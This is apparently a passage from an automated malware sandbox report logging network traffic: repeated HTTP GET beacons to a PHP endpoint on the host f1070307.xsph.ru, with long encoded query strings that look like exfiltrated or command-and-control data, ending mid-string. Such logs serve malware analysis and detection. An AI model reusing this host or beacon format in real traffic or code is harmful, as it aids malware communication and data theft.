kMJJTT6NGVPhXW65UNJ1mTyklaOhmWHpVNZRlWtpVbOhGaUpFeJNETpRzaJZTSD5UakRlWp50VahXTX5keZRUTzE1VPhXTtlFNZdkWwklaapXR61EbKRlT4NmaOh3ZqpFNjR0TpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=QX9JSUNJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1IDOzgTYyEWM1gTOkNWMiFWMiBjZ3YDZhV2YxM2NjlzNzcjNkNzNjJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=d1nIiojIyMWY1QzN2QWMjdDMhRTZzI2MxUWNkZmYmFGOlRDOhFmIsIiNmFmY2gDOihDZ5QmZ2kDZzUGZ4ETYyE2YmVjY2gjNjRjMjZmNmlDOiojI0cDOwEGOygjM3EmZ2YmZmhDZhlDOwUmY5MGOwEWN4AjIsIiYkFTN1ETYkZTN0YDNmNzNwcDO5QmYkFmYwEDO5AzMxITO2QzMmBDZiojIjdjNhFzMkFjYxQGOkJ2YwQTMmVzNwUjM5MDNzQGNyYjI7xSfiElZ5oUaUl2bqlEMVpmTqpkMNpmUH5EbWRlTyk0RPlmSq1EbkRVW1sGVadXS65UaadVTzsGVZRTQql1MrpmT4l0QMlGNrlkNJN0T5FlMZFTU6llerRVWqJEVZdXU6lVNBRkWtZ1VNhXRH1EenRVW3llMOBTVt5EaGdVW0Ukaal2dpl0TKl2Tpl0ROtmSX90dN1mWo50VPFTVy0EbWpXToJ1VapmUXl1aKpmW1UEVPhmWqp1MJdlTp5kaZlXWtl0cJlGVp9maJ1mTqpFbKpmWr5UbaVzZqlVaCpWTrZ0VZdXVy40MnpXW4l0RalXSE9UMJdVT1cmaNFTUE1UaKNETpRzaJZTST9EaG1mT4FEVO1GbUp1MnpnT0klaZRTWH9UMVpmW6V1VNFzaq5EMnR1T5VkaOJTSE5EaWJTTpdXaJ9kSp9UaV1WTtJFRNpXTX10dVJTWrRGVONTSq5EaadUTthGRPFTWUl1MJd0T5FkaZhXSU5UeNRUTtpkaJNXSpRVavpWSoRGROJzYU5ENrRkT1kleZ1mRE9kaGRUTrJkaNNTRy4keNRVWycGVOVTRtlVNrpnTxEFRalmSDxUa0sWS2k0UNxmVU5UaCRVWykFVNJzZUlFerRlTz00VPdXSE5keZRkTpJkeOxmRU1UeJpmTzUFRNFTWX5Ua3lWSPpUaPlWSE9kenpXTxEERNhGbql1aa1mT310RPVTUX1EaoRVWrp1RNlmWXpleF1WW3llMZxmUt1UNJpWSzlUaUl2bqlEMFpWW3V0RalGZE5UNRRlTsZEVN1mVyklerR1T3llaZ1mVH1UbORlTxkERalXUt10dNRUTzk0QMlGNrlkNJlmTopkaaJTWE5keRRlW6lVbOh3aE90aKRlTy00VaRTTEpVaGRkT4V0VNh3ZEpFMV1mToxGVOl2dpl0TKl2TpNGVOFTUH9keZpXToZERPhmR65UeFRlTtJ1RNBTUy40aKd0T5tmeNRTTqpVeF1WT00EVaNTUql0cJlGVp9maJRTQUlVaOdUT0kkeZJTUU5ENjpXWqplaZVTVU1UMRpmT3VVbONTVUlFNVd1TpxmeOhXRykFMJNETpRzaJZTSplFbGdVW0cmaZdXQUl1akpnTpJFRNhmVH50MNR1TykEVNlXSU5EaaRlT4VFRatmVX5kMF1mWpdXaJ9kSp9UaZRkToZ0VZpmR650MJ1mT310ROd3aq1UNFpmT1kERPhGZU1EaadlW0E1ROlXVq1EeRJTW5VVbJNXSpRVavpWS5lFVNhmT6lFaKRUTp50RNJTUXpFaGd0T61kaatGbU9keBpWW3lkaaNzZE1EbSpWT3F1ValmSDxUa0sWS2kUeNdXWy4UaOJTW3NGROpXSqpVMV1mW0EERalmV610dRdlT5VERPVTQq1EeNJTWsJkaOp3Yq5Ua3lWSPpUaPlWUt1EaOdUTzk1Rah3a6lVenpXW310VOdXTH9EakpWT6tmaa1mU650MVdlT